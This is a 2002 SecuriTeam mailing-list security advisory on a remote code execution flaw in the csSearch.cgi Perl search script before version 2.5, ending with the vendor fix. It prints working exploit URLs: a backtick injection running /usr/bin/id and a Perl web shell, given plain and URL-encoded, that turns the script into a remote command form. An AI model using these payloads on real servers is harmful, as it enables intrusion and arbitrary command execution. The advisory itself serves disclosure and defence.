[UNIX] csSearch.cgi Vulnerable to Remote Code Execution

From: support@securiteam.com
Date: 03/28/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 28 Mar 2002 13:18:29 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  csSearch.cgi Vulnerable to Remote Code Execution
------------------------------------------------------------------------

SUMMARY

csSearch is a free Perl CGI search script developed by Mike Barone and
Andy Angrick. According to the website (cgiscript.net) over 17,000 people
have downloaded csSearch.

csSearch stores it's configuration data as Perl code in a file called
"setup.cgi" which is eval()uated by the script to load it back into memory
at runtime. Due to an Access Validation Error, any user can cause
configuration data to be written to "setup.cgi" and therefore execute
arbitrary Perl code on the server.

DETAILS

Vulnerable systems:
csSearch versions prior to 2.5

Immune systems:
csSearch version 2.5

Configuration data is saved with the following URL. Note that any Perl
code would need to be URL encoded.

csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE

For example, the classic "/usr/bin/id" example would be as follows:

csSearch.cgi?command=savesetup&setup=`/usr/bin/id`

Here's something a little more interesting, less than 300 bytes of code
that turns csSearch into a remote web shell of sorts.

*ShowSearchForm = *Login = sub {
  print "<form method=post action=csSearch.cgi>Enter Command (eg: ls
-l)<br>";
  print "<input type=text name=cmd size=99> ";
  print "<input type=submit value=Execute><hr><xmp>";
  $in{'cmd'} && print `$in{'cmd'} 2>&1`;
  exit;
  };

URL Encoded as:
csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+metho
d%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name
%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26pri
nt`$in{'cmd'}+2>%261`;exit;};

Impact:
Because of the high number of users who have downloaded this script (over
17,000 according to cgiscript.net) and the fact that search engines can
easily be used to identify sites with the unique "csSearch.cgi" script
name, the risk posed by this flaw is very high indeed.

Solution:
Vendor has released a new version, csSearch 2.5, which patches the flaw.
ISPs and Web hosts may want to consider searching for this script on their
servers ("csSearch.cgi") and disabling it or advising their customers of
the risk until they can install the patched version.

ADDITIONAL INFORMATION

The information has been provided by <mailto:stegus1@yahoo.com> Steve
Gustin.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.